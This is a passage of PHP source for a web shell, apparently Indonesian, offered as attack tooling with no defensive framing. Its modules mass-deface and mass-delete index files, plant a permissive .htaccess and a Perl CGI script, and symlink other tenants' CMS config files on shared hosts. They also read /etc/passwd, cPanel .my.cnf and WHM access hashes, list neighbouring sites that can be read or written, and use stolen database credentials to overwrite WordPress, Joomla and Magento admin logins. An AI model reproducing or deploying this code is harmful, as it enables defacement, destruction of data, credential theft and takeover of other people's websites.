  776. <input type='radio' name='tipe_sabun' value='murah' checked>Biasa<input type='radio' name='tipe_sabun' value='mahal'>Massal<br>
  777. <font style='text-decoration: underline;'>Folder:</font><br>
  778. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  779. <font style='text-decoration: underline;'>Filename:</font><br>
  780. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  781. <font style='text-decoration: underline;'>Index File:</font><br>
  782. <textarea name='script' style='width: 450px; height: 200px;'>Ownd by Mr.CyB3R_INk146</textarea><br>
  783. <input type='submit' name='start' value='Mass Deface' style='width: 450px;'>
  784. </form></center>";
  785. }
  786. } elseif($_GET['do'] == 'mass_delete') {
  787. function hapus_massal($dir,$namafile) {
  788. if(is_writable($dir)) {
  789. $dira = scandir($dir);
  790. foreach($dira as $dirb) {
  791. $dirc = "$dir/$dirb";
  792. $lokasi = $dirc.'/'.$namafile;
  793. if($dirb === '.') {
  794. if(file_exists("$dir/$namafile")) {
  795. unlink("$dir/$namafile");
  796. }
  797. } elseif($dirb === '..') {
  798. if(file_exists("".dirname($dir)."/$namafile")) {
  799. unlink("".dirname($dir)."/$namafile");
  800. }
  801. } else {
  802. if(is_dir($dirc)) {
  803. if(is_writable($dirc)) {
  804. if(file_exists($lokasi)) {
  805. echo "[<font color=lime>DELETED</font>] $lokasi<br>";
  806. unlink($lokasi);
  807. $idx = hapus_massal($dirc,$namafile);
  808. }
  809. }
  810. }
  811. }
  812. }
  813. }
  814. }
  815. if($_POST['start']) {
  816. echo "<div style='margin: 5px auto; padding: 5px'>";
  817. hapus_massal($_POST['d_dir'], $_POST['d_file']);
  818. echo "</div>";
  819. } else {
  820. echo "<center>";
  821. echo "<form method='post'>
  822. <font style='text-decoration: underline;'>Folder:</font><br>
  823. <input type='text' name='d_dir' value='$dir' style='width: 450px;' height='10'><br>
  824. <font style='text-decoration: underline;'>Filename:</font><br>
  825. <input type='text' name='d_file' value='index.php' style='width: 450px;' height='10'><br>
  826. <input type='submit' name='start' value='Mass Delete' style='width: 450px;'>
  827. </form></center>";
  828. }
  829. } elseif($_GET['do'] == 'config') {
  830. $idx = mkdir("idx_config", 0777);
  831. $isi_htc = "Options FollowSymLinks MultiViews Indexes ExecCGI\nRequire None\nSatisfy Any\nAddType application/x-httpd-cgi .cin\nAddHandler cgi-script .cin\nAddHandler cgi-script .cin";
  832. $htc = fopen("idx_config/.htaccess","w");
  833. fwrite($htc, $isi_htc);
  834. fclose($htc);
  835. if(preg_match("/vhosts|vhost/", $dir)) {
  836. $link_config = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  837. $vhost = "#!/usr/bin/perl -I/usr/local/bandmin
opendir(my $dir , "/var/www/vhosts/");
foreach(sort readdir $dir) {
    my $isDir = 0;
    $isDir = 1 if -d $_;
$sitess = $_;


symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/configure.php',$sitess.'-shop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/os/includes/configure.php',$sitess.'-shop-os.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscom/includes/configure.php',$sitess.'-oscom.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerce/includes/configure.php',$sitess.'-oscommerce.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/oscommerces/includes/configure.php',$sitess.'-oscommerces.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/configure.php',$sitess.'-shop2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shopping/includes/configure.php',$sitess.'-shop-shopping.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sale/includes/configure.php',$sitess.'-sale.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/amember/config.inc.php',$sitess.'-amember.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.inc.php',$sitess.'-amember2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/members/configuration.php',$sitess.'-members.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/config.php',$sitess.'-forum.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/includes/config.php',$sitess.'-forums.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/conf.php',$sitess.'-5.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-4.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/WP/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wp/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/press/wp-config.php',$sitess.'-wp13-press.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/wp-config.php',$sitess.'-wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Wordpress/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/wordpress/beta/wp-config.php',$sitess.'-Wordpress.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/wp-config.php',$sitess.'-Wordpress-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/wp-config.php',$sitess.'-Wordpress-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blog/wp-config.php',$sitess.'-Wordpress-blog.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/beta/wp-config.php',$sitess.'-Wordpress-beta.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/blogs/wp-config.php',$sitess.'-Wordpress-blogs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/wp-config.php',$sitess.'-Wordpress-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/wp-config.php',$sitess.'-Wordpress-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/wp-config.php',$sitess.'-Wordpress-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/wp-config.php',$sitess.'-Wordpress-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/test/wp-config.php',$sitess.'-Wordpress-test.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/arcade/functions/dbclass.php',$sitess.'-ibproarcade.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joomla/configuration.php',$sitess.'-joomla2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/protal/configuration.php',$sitess.'-joomla-protal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/joo/configuration.php',$sitess.'-joo.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cms/configuration.php',$sitess.'-joomla-cms.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/site/configuration.php',$sitess.'-joomla-site.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/main/configuration.php',$sitess.'-joomla-main.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/news/configuration.php',$sitess.'-joomla-news.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/new/configuration.php',$sitess.'-joomla-new.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/home/configuration.php',$sitess.'-joomla-home.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/config.php',$sitess.'-vb~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb3/includes/config.php',$sitess.'-vb3~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/config.php',$sitess.'-vb1~config.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/includes/class_core.php',$sitess.'-vbluttin~class_core.php.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/vb/includes/class_core.php',$sitess.'-vbluttin~class_core.php1.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cc/includes/class_core.php',$sitess.'-vbluttin~class_core.php2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm15.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/central/configuration.php',$sitess.'-whm-central.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/whmcs/configuration.php',$sitess.'-whm-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/WHMCS/configuration.php',$sitess.'-whm-WHMCS.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmc/WHM/configuration.php',$sitess.'-whmc-WHM.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whmcs/configuration.php',$sitess.'-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/configuration.php',$sitess.'-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supp/configuration.php',$sitess.'-supp.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/configuration.php',$sitess.'-sucure.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whm/configuration.php',$sitess.'-sucure-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/secure/whmcs/configuration.php',$sitess.'-sucure-whmcs.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cpanel/configuration.php',$sitess.'-cpanel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/panel/configuration.php',$sitess.'-panel.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/configuration.php',$sitess.'-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/configuration.php',$sitess.'-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/configuration.php',$sitess.'-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/configuration.php',$sitess.'-joomla.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/submitticket.php',$sitess.'-whmcs2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clients/configuration.php',$sitess.'-clients.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientes/configuration.php',$sitess.'-clientes.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/cliente/configuration.php',$sitess.'-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/clientsupport/configuration.php',$sitess.'-clientsupport.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/configuration.php',$sitess.'-billing.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/manage/configuration.php',$sitess.'-whm-manage.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/my/configuration.php',$sitess.'-whm-my.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/myshop/configuration.php',$sitess.'-whm-myshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/dist-configure.php',$sitess.'-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/zencart/includes/dist-configure.php',$sitess.'-shop-zencart.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/shop/includes/dist-configure.php',$sitess.'-shop-ZCshop.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/Settings.php',$sitess.'-smf.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/smf/Settings.php',$sitess.'-smf2.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forum/Settings.php',$sitess.'-smf-forum.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/forums/Settings.php',$sitess.'-smf-forums.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/upload/includes/config.php',$sitess.'-up.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/article/config.php',$sitess.'-Nwahy.txt'); 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/up/includes/config.php',$sitess.'-up2.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/conf_global.php',$sitess.'-6.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/include/db.php',$sitess.'-7.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/connect.php',$sitess.'-PHP-Fusion.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/mk_conf.php',$sitess.'-9.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config.php',$sitess.'-4images.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/sites/default/settings.php',$sitess.'-Drupal.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/member/configuration.php',$sitess.'-1member.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/configuration.php',$sitess.'-billings.txt') ; 
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/whm/configuration.php',$sitess.'-whm.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/configuration.php',$sitess.'-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/requires/config.php',$sitess.'-AM4SS-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/supports/includes/iso4217.php',$sitess.'-hostbills-supports.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/client/includes/iso4217.php',$sitess.'-hostbills-client.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/support/includes/iso4217.php',$sitess.'-hostbills-support.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billing/includes/iso4217.php',$sitess.'-hostbills-billing.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/billings/includes/iso4217.php',$sitess.'-hostbills-billings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/host/includes/iso4217.php',$sitess.'-hostbills-host.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosts/includes/iso4217.php',$sitess.'-hostbills-hosts.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hosting/includes/iso4217.php',$sitess.'-hostbills-hosting.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostings/includes/iso4217.php',$sitess.'-hostbills-hostings.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/hostbillincludes/iso4217.php',$sitess.'-hostbills-hostbills.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/includes/iso4217.php',$sitess.'-hostbills-hostbill.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/app/etc/local.xml',$sitess.'-Magento.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/admin/config.php',$sitess.'-Opencart.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/settings.inc.php',$sitess.'-Prestashop.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/lokomedia/config/koneksi.php',$sitess.'-Lokomedia.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/slconfig.php',$sitess.'-Sitelock.txt');
symlink('/var/www/vhosts/'.$sitess.'/httpdocs/application/config/database.php',$sitess.'-Ellislab.txt');
}
print "Location: ./\n\n";";
  838. $file = "idx_config/vhost.cin";
  839. $handle = fopen($file ,"w+");
  840. fwrite($handle ,base64_decode($vhost));
  841. fclose($handle);
  842. chmod($file, 0755);
  843. if(exe("cd idx_config && ./vhost.cin")) {
  844. echo "<center><a href='$link_config/idx_config'><font color=lime>Done</font></a></center>";
  845. } else {
  846. echo "<center><a href='$link_config/idx_config/vhost.cin'><font color=lime>Done</font></a></center>";
  847. }
  848.  
  849. } else {
  850. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  851. while($passwd = fgets($etc)) {
  852. if($passwd == "" || !$etc) {
  853. echo "<font color=red>Can't read /etc/passwd</font>";
  854. } else {
  855. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  856. foreach($user_config[1] as $user_idx) {
  857. $user_config_dir = "/home/$user_idx/public_html/";
  858. if(is_readable($user_config_dir)) {
  859. $grab_config = array(
  860. "/home/$user_idx/.my.cnf" => "cpanel",
  861. "/home/$user_idx/.accesshash" => "WHM-accesshash",
  862. "$user_config_dir/po-content/config.php" => "Popoji",
  863. "$user_config_dir/vdo_config.php" => "Voodoo",
  864. "$user_config_dir/bw-configs/config.ini" => "BosWeb",
  865. "$user_config_dir/config/koneksi.php" => "Lokomedia",
  866. "$user_config_dir/lokomedia/config/koneksi.php" => "Lokomedia",
  867. "$user_config_dir/clientarea/configuration.php" => "WHMCS",
  868. "$user_config_dir/whm/configuration.php" => "WHMCS",
  869. "$user_config_dir/whmcs/configuration.php" => "WHMCS",
  870. "$user_config_dir/forum/config.php" => "phpBB",
  871. "$user_config_dir/sites/default/settings.php" => "Drupal",
  872. "$user_config_dir/config/settings.inc.php" => "PrestaShop",
  873. "$user_config_dir/app/etc/local.xml" => "Magento",
  874. "$user_config_dir/joomla/configuration.php" => "Joomla",
  875. "$user_config_dir/configuration.php" => "Joomla",
  876. "$user_config_dir/wp/wp-config.php" => "WordPress",
  877. "$user_config_dir/wordpress/wp-config.php" => "WordPress",
  878. "$user_config_dir/wp-config.php" => "WordPress",
  879. "$user_config_dir/admin/config.php" => "OpenCart",
  880. "$user_config_dir/slconfig.php" => "Sitelok",
  881. "$user_config_dir/application/config/database.php" => "Ellislab");
  882. foreach($grab_config as $config => $nama_config) {
  883. $ambil_config = file_get_contents($config);
  884. if($ambil_config == '') {
  885. } else {
  886. $file_config = fopen("idx_config/$user_idx-$nama_config.txt","w");
  887. fputs($file_config,$ambil_config);
  888. }
  889. }
  890. }
  891. }
  892. }
  893. }
  894. echo "<center><a href='?dir=$dir/idx_config'><font color=lime>Done</font></a></center>";
  895. }
  896. } elseif($_GET['do'] == 'jumping') {
  897. $i = 0;
  898. echo "<div class='margin: 5px auto;'>";
  899. if(preg_match("/hsphere/", $dir)) {
  900. $urls = explode("\r\n", $_POST['url']);
  901. if(isset($_POST['jump'])) {
  902. echo "<pre>";
  903. foreach($urls as $url) {
  904. $url = str_replace(array("http://","www."), "", strtolower($url));
  905. $etc = "/etc/passwd";
  906. $f = fopen($etc,"r");
  907. while($gets = fgets($f)) {
  908. $pecah = explode(":", $gets);
  909. $user = $pecah[0];
  910. $dir_user = "/hsphere/local/home/$user";
  911. if(is_dir($dir_user) === true) {
  912. $url_user = $dir_user."/".$url;
  913. if(is_readable($url_user)) {
  914. $i++;
  915. $jrw = "[<font color=lime>R</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  916. if(is_writable($url_user)) {
  917. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$url_user'><font color=gold>$url_user</font></a>";
  918. }
  919. echo $jrw."<br>";
  920. }
  921. }
  922. }
  923. }
  924. if($i == 0) {
  925. } else {
  926. echo "<br>Total ada ".$i." Kamar di ".$ip;
  927. }
  928. echo "</pre>";
  929. } else {
  930. echo '<center>
  931. <form method="post">
  932. List Domains: <br>
  933. <textarea name="url" style="width: 500px; height: 250px;">';
  934. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  935. while($getss = fgets($fp)) {
  936. echo $getss;
  937. }
  938. echo '</textarea><br>
  939. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  940. </form></center>';
  941. }
  942. } elseif(preg_match("/vhosts|vhost/", $dir)) {
  943. preg_match("/\/var\/www\/(.*?)\//", $dir, $vh);
  944. $urls = explode("\r\n", $_POST['url']);
  945. if(isset($_POST['jump'])) {
  946. echo "<pre>";
  947. foreach($urls as $url) {
  948. $url = str_replace("www.", "", $url);
  949. $web_vh = "/var/www/".$vh[1]."/$url/httpdocs";
  950. if(is_dir($web_vh) === true) {
  951. if(is_readable($web_vh)) {
  952. $i++;
  953. $jrw = "[<font color=lime>R</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  954. if(is_writable($web_vh)) {
  955. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$web_vh'><font color=gold>$web_vh</font></a>";
  956. }
  957. echo $jrw."<br>";
  958. }
  959. }
  960. }
  961. if($i == 0) {
  962. } else {
  963. echo "<br>Total ada ".$i." Kamar di ".$ip;
  964. }
  965. echo "</pre>";
  966. } else {
  967. echo '<center>
  968. <form method="post">
  969. List Domains: <br>
  970. <textarea name="url" style="width: 500px; height: 250px;">';
  971. bing("ip:$ip");
  972. echo '</textarea><br>
  973. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  974. </form></center>';
  975. }
  976. } else {
  977. echo "<pre>";
  978. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  979. while($passwd = fgets($etc)) {
  980. if($passwd == '' || !$etc) {
  981. echo "<font color=red>Can't read /etc/passwd</font>";
  982. } else {
  983. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  984. foreach($user_jumping[1] as $user_idx_jump) {
  985. $user_jumping_dir = "/home/$user_idx_jump/public_html";
  986. if(is_readable($user_jumping_dir)) {
  987. $i++;
  988. $jrw = "[<font color=lime>R</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  989. if(is_writable($user_jumping_dir)) {
  990. $jrw = "[<font color=lime>RW</font>] <a href='?dir=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  991. }
  992. echo $jrw;
  993. if(function_exists('posix_getpwuid')) {
  994. $domain_jump = file_get_contents("/etc/named.conf");
  995. if($domain_jump == '') {
  996. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  997. } else {
  998. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  999. foreach($domains_jump[1] as $dj) {
  1000. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  1001. $user_jumping_url = $user_jumping_url['name'];
  1002. if($user_jumping_url == $user_idx_jump) {
  1003. echo " => ( <u>$dj</u> )<br>";
  1004. break;
  1005. }
  1006. }
  1007. }
  1008. } else {
  1009. echo "<br>";
  1010. }
  1011. }
  1012. }
  1013. }
  1014. }
  1015. if($i == 0) {
  1016. } else {
  1017. echo "<br>Total ada ".$i." Kamar di ".$ip;
  1018. }
  1019. echo "</pre>";
  1020. }
  1021. echo "</div>"; } if($_GET['do'] == 'hash') {
  1022. $submit= $_POST['enter'];
  1023. if (isset($submit)) {
  1024. $pass = $_POST['password']; // password
  1025. $salt = '}#f4ga~g%7hjg4&j(7mk?/!bj30ab-wi=6^7-$^R9F|GK5J#E6WT;IO[JN'; // random string
  1026. $hash = md5($pass); // md5 hash #1
  1027. $md4 = hash("md4",$pass);
  1028. $hash_md5 = md5($salt.$pass); // md5 hash with salt #2
  1029. $hash_md5_double = md5(sha1($salt.$pass)); // md5 hash with salt & sha1 #3
  1030. $hash1 = sha1($pass); // sha1 hash #4
  1031. $sha256 = hash("sha256",$text);
  1032. $hash1_sha1 = sha1($salt.$pass); // sha1 hash with salt #5
  1033. $hash1_sha1_double = sha1(md5($salt.$pass)); // sha1 hash with salt & md5 #6
  1034. }
  1035. echo '<form action="" method="post"><b><table class=tabnet>';
  1036. echo '<tr><th colspan="2">Password Hash</th></center></tr>';
  1037. echo '<tr><td><b>masukan kata yang ingin di encrypt:</b></td>';
  1038. echo '<td><input class="inputz" type="text" name="password" size="40" />';
  1039. echo '<input class="inputzbut" type="submit" name="enter" value="hash" />';
  1040. echo '</td></tr><br>';
  1041. echo '<tr><th colspan="2">Hasil Hash</th></center></tr>';
  1042. echo '<tr><td>Original Password</td><td><input class=inputz type=text size=50 value='.$pass.'></td></tr><br><br>';
  1043. echo '<tr><td>MD5</td><td><input class=inputz type=text size=50 value='.$hash.'></td></tr><br><br>';
  1044. echo '<tr><td>MD4</td><td><input class=inputz type=text size=50 value='.$md4.'></td></tr><br><br>';
  1045. echo '<tr><td>MD5 with Salt</td><td><input class=inputz type=text size=50 value='.$hash_md5.'></td></tr><br><br>';
  1046. echo '<tr><td>MD5 with Salt & Sha1</td><td><input class=inputz type=text size=50 value='.$hash_md5_double.'></td></tr><br><br>';
  1047. echo '<tr><td>Sha1</td><td><input class=inputz type=text size=50 value='.$hash1.'></td></tr><br><br>';
  1048. echo '<tr><td>Sha256</td><td><input class=inputz type=text size=50 value='.$sha256.'></td></tr><br><br>';
  1049. echo '<tr><td>Sha1 with Salt</td><td><input class=inputz type=text size=50 value='.$hash1_sha1.'></td></tr><br><br>';
  1050. echo '<tr><td>Sha1 with Salt & MD5</td><td><input class=inputz type=text size=50 value='.$hash1_sha1_double.'></td></tr><br><br></table>';
  1051. } elseif($_GET['do'] == 'auto_edit_user') {
  1052. if($_POST['hajar']) {
  1053. if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  1054. echo "username atau password harus lebih dari 6 karakter";
  1055. } else {
  1056. $user_baru = $_POST['user_baru'];
  1057. $pass_baru = md5($_POST['pass_baru']);
  1058. $conf = $_POST['config_dir'];
  1059. $scan_conf = scandir($conf);
  1060. foreach($scan_conf as $file_conf) {
  1061. if(!is_file("$conf/$file_conf")) continue;
  1062. $config = file_get_contents("$conf/$file_conf");
  1063. if(preg_match("/JConfig|joomla/",$config)) {
  1064. $dbhost = ambilkata($config,"host = '","'");
  1065. $dbuser = ambilkata($config,"user = '","'");
  1066. $dbpass = ambilkata($config,"password = '","'");
  1067. $dbname = ambilkata($config,"db = '","'");
  1068. $dbprefix = ambilkata($config,"dbprefix = '","'");
  1069. $prefix = $dbprefix."users";
  1070. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1071. $db = mysql_select_db($dbname);
  1072. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1073. $result = mysql_fetch_array($q);
  1074. $id = $result['id'];
  1075. $site = ambilkata($config,"sitename = '","'");
  1076. $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  1077. echo "Config => ".$file_conf."<br>";
  1078. echo "CMS => Joomla<br>";
  1079. if($site == '') {
  1080. echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  1081. } else {
  1082. echo "Sitename => $site<br>";
  1083. }
  1084. if(!$update OR !$conn OR !$db) {
  1085. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1086. } else {
  1087. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1088. }
  1089. mysql_close($conn);
  1090. } elseif(preg_match("/WordPress/",$config)) {
  1091. $dbhost = ambilkata($config,"DB_HOST', '","'");
  1092. $dbuser = ambilkata($config,"DB_USER', '","'");
  1093. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  1094. $dbname = ambilkata($config,"DB_NAME', '","'");
  1095. $dbprefix = ambilkata($config,"table_prefix = '","'");
  1096. $prefix = $dbprefix."users";
  1097. $option = $dbprefix."options";
  1098. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1099. $db = mysql_select_db($dbname);
  1100. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  1101. $result = mysql_fetch_array($q);
  1102. $id = $result[ID];
  1103. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  1104. $result2 = mysql_fetch_array($q2);
  1105. $target = $result2[option_value];
  1106. if($target == '') {
  1107. $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  1108. } else {
  1109. $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  1110. }
  1111. $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  1112. echo "Config => ".$file_conf."<br>";
  1113. echo "CMS => Wordpress<br>";
  1114. echo $url_target;
  1115. if(!$update OR !$conn OR !$db) {
  1116. echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  1117. } else {
  1118. echo "Status => <font color=lime>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  1119. }
  1120. mysql_close($conn);
  1121. } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  1122. $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  1123. $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  1124. $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  1125. $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  1126. $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  1127. $prefix = $dbprefix."admin_user";
  1128. $option = $dbprefix."core_config_data";
  1129. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  1130. $db = mysql_select_db($dbname);
